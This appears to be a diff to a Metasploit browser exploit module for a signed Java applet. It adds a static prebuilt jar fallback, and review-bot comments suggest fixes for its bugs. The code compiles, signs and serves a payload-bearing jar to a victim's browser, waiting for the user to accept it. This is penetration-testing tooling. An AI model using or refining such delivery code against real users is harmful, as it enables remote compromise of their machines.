diff --git a/data/exploits/java_signed_applet.jar b/data/exploits/java_signed_applet.jar
new file mode 100644
index 0000000000..a1410036b5
Binary files /dev/null and b/data/exploits/java_signed_applet.jar differ
diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb
index 4da6660e11..a32d5eb950 100644
--- a/modules/exploits/multi/browser/java_signed_applet.rb
+++ b/modules/exploits/multi/browser/java_signed_applet.rb
@@ -113,6 +113,16 @@ class Metasploit3 < Msf::Exploit::Remote
 # Currently doing all processing in on_request_uri.
 # If this is too slow, we can move applet generation up here.
 #
+
+ @use_static = false
+
+ if not @jvm_init
+ print_error
+ print_error "JVM not initialized. You must install the Java Development Kit, the rjb ruby gem, and set the $JAVA_HOME variable."
+ print_error "Falling back to static signed applet. This exploit will still work, but the CERTCN and APPLETNAME variables will be ignored."
+ print_error
+ @use_static = true
+ end
 super
 end
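Review bot: `if not @jvm_init` is evaluated before `super`, so if the Java mixin only assigns @jvm_init inside its own initialize (the error text suggests the rjb/JDK probe lives there), this check always reads nil and every module instance silently takes the static-jar path even on a correctly configured host; worth confirming where @jvm_init is set and moving the check after `super` if that is the case. A smaller point of style: `unless @jvm_init` is the idiomatic form of `if not @jvm_init`. The fallback decision is also worth a one-line comment above the assignment, e.g. `# Without a JVM we cannot compile/sign per-request, so serve the prebuilt jar from data/exploits instead.`, since the reader of on_request_uri otherwise has to find this flag's meaning here.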
@@ -374,43 +384,52 @@ public class #{datastore['APPLETNAME']} extends Applet
 end
 end
- appletcode = get_code(cli)
+ if not @use_static
+ appletcode = get_code(cli)
- print_status "Compiling applet classes..."
- compile( appletcode['classnames'], appletcode['codefiles'] )
+ print_status "Compiling applet classes..."
+ compile( appletcode['classnames'], appletcode['codefiles'] )
- print_status "Compile completed. Building jar file..."
+ print_status "Compile completed. Building jar file..."
- unsignedjar = "unsigned_#{datastore['APPLETNAME']}.jar"
- @signedjar = "#{datastore['APPLETNAME']}.jar"
+ unsignedjar = "unsigned_#{datastore['APPLETNAME']}.jar"
+ @signedjar = "#{datastore['APPLETNAME']}.jar"
- build_jar( unsignedjar,
- [ # Applet
- datastore['APPLETNAME'] + ".class",
- # PayloadX class
- datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class",
- # PayloadX StreamConnector for pure Java payload
- datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" ] )
-
- print_status "Jar built. Signing..."
+ build_jar( unsignedjar,
+ [ # Applet
+ datastore['APPLETNAME'] + ".class",
+ # PayloadX class
+ datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class",
+ # PayloadX StreamConnector for pure Java payload
+ datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" ] )
+
+ print_status "Jar built. Signing..."
+
+ sign_jar( datastore['CERTCN'], unsignedjar, @signedjar )
+
+ print_status "Jar signed. Ready to send."
+ else
+ print_status "Using static, signed jar. Ready to send."
+ end
- sign_jar( datastore['CERTCN'], unsignedjar, @signedjar )
-
- print_status "Jar signed. Ready to send."
-
 # TODO: gzip data and parse in java
 send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } )
 return
 end
 # load the jar file
- if File.exists? File.join( datastore['JAVACACHE'], @signedjar )
- path = File.join( datastore['JAVACACHE'], @signedjar )
- fd = File.open( path, "rb" )
+ if @use_static
+ path = File.join( Msf::Config.install_root, "data", "exploits", "java_signed_applet.jar" )
+ elsif File.exists? File.join( datastore['JAVACACHE'], @signedjar )
+ path = File.join( datastore['JAVACACHE'], @signedjar )
+ end
+
+ if path
+ fd = File.open( path, "rb" )
 @jar_data = fd.read(fd.stat.size)
 fd.close
 end
-
+
 print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}. Waiting for user to click 'accept'..." )
 send_response( cli, @jar_data, { 'Content-Type' => "application/octet-stream" } )
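Review bot: When neither branch assigns `path` (JVM available but the cached jar is not yet in JAVACACHE, e.g. a jar request arriving before the HTML request built it), the new `if path` guard skips the read and control falls through to `send_response( cli, @jar_data, ... )`, sending nil on the first request or a stale jar left in @jar_data by an earlier one; an `unless path` early return with a 404 closes that hole. The static branch also loads the jar without any check that the file exists, so a missing or partially installed data/exploits file surfaces only as an exception from `File.open`, which the same guard handles if it is placed after the path selection rather than before the read. `File.exists?` is deprecated on current Rubies in favour of `File.exist?`. The enclosing on_request_uri handler starts and ends outside the hunk.
```ruby
    if @use_static
      path = File.join( Msf::Config.install_root, "data", "exploits", "java_signed_applet.jar" )
    elsif File.exist? File.join( datastore['JAVACACHE'], @signedjar )
      path = File.join( datastore['JAVACACHE'], @signedjar )
    end

    # Nothing to serve yet (static jar missing, or applet not built/signed): say so
    # instead of sending nil or a jar left over from a previous request.
    unless path && File.exist?( path )
      print_error "No signed jar available to send (expected #{path.inspect})."
      send_not_found( cli )
      return
    end

    # Block form closes the handle even if the read raises.
    File.open( path, "rb" ) { |fd| @jar_data = fd.read }
    # … unchanged: print_status / send_response …
```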